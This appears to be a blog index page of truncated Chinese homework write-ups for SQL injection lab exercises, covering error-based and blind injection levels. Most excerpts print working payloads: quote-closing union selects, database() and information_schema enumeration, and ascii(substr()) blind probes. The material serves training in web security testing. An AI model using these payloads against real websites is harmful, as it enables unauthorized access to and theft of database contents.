6.2.2-SQL注入-盲注Rank 2 作业
迷之作业又来了,还是走的老套路,闭合问题,源码是 Your sql statement is SELECT * FROM users WHERE id="1" LIMIT 0,1rank2和rank1相比,明显是用 " 来闭合,语句和方法都是一样的,那么引用聂风老师的口头禅:”毁~“ 复制粘贴大法来了猜表名:1.输入"an
6.2.1-SQL注入-盲注Rank 1 作业
盲注确实很讨厌呀~一个一个手动去试。和显错注入原理一样的,只是不给你回显,要我们手动去拆解字符,这里就不分析过程了,简单的二分法,我只是把结果放上来了。猜表名:1.输入'and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,
6.1.4-SQL注入-显错注入Rank 4 作业
和rank3差不多,看源码Your sql statement is SELECT * FROM users WHERE id=("1") LIMIT 0,1 这里得用 ") 来闭合了,看我复制粘贴大法~1.输入")and 1=2 union select 1,2,3 --+ 发现有两个注入点,2和
6.1.3-SQL注入-显错注入Rank 3 作业
综合前面两个rank来看,这个题考的仍然是闭合点,我们加了?id=1回车之后,看到源码是这样的Your sql statement is SELECT * FROM users WHERE id=('1') LIMIT 0,1 于是我们闭合的时候需要用 ') 来闭合就好了1.输入')and 1=2 union sel
6.1.2-SQL注入-显错注入Rank 2 作业
迷之作业,和rank1一毛一样,就是闭合点需要留意一下,源代码里并没有单引号,所以就无需单引号闭合了,这里照抄rank1的风格了。。。。。1.输入and 1=2 union select 1,2,3 --+ 发现有两个注入点,2和32.输入and 1=2 union select 1,2,database() --+ 查看数据库名是security3.输入and 1=2 u
6.1.1-SQL注入-显错注入Rank 1 作业
1.输入'and 1=2 union select 1,2,3 --+ 发现有两个注入点,2和32.输入'and 1=2 union select 1,2,database() --+ 查看数据库名是security3.输入'and 1=2 union select 1,2,table_name from information_schema.tab